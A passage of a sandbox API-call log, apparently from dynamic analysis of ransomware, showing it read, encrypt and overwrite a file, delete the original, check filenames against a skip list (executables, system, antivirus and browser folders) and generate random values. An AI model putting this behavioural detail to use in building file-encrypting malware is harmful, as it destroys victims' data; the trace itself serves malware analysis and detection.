lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.399] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.399] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.399] GetLastError () returned 0x0 [0165.399] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.400] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.400] GetLastError () returned 0x0 [0165.400] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.400] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.400] GetLastError () returned 0x0 [0165.400] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.400] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xc4, lpOverlapped=0x0) returned 1 [0165.400] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xc4, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xd0) returned 1 [0165.400] GetLastError () returned 0x0 [0165.400] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xd0, lpOverlapped=0x0) returned 1 [0165.400] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.400] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.400] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf") returned 1 [0165.401] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf")) returned 0 [0165.401] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" [0165.401] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.401] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF996.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf996.tmp")) returned 0xf996 [0165.402] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF996.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf996.tmp"), dwFlags=0x1) returned 0 [0165.402] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF996.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf996.tmp")) returned 1 [0165.403] CryptDestroyKey (hKey=0x9ad438) returned 1 [0165.403] wcslen (_String="OK") returned 0x2 [0165.403] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.403] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.403] CryptDestroyKey (hKey=0x9ad138) returned 1 [0165.403] CryptDestroyHash (hHash=0x9ad538) returned 1 [0165.403] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*NMCRYPT") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*Recovers your files.html") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.exe") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.dll") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.lnk") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.bat") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.ini") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.msi") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*.scf") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*pagefile.sys*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*NTUSER.DAT*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*AppData*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\winrar\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\java\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\windows\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\ESET\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\AVG\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\AVIRA\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*Atheros*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*Realtek*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*bootmgr*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*boot*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*boot*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*CONFIG.SYS*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*IO.SYS*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*MSDOS.SYS*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*NTDETECT.COM*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*ntldr*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*chrome*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*opera*") returned 0 [0165.403] PathMatchSpecW (pszFile="Shades of Blue.htm", pszSpec="*firefox*") returned 0 [0165.403] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm", pszSpec="*") returned 1 [0165.403] strlen (_Str="NMoreira") returned 0x8 [0165.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 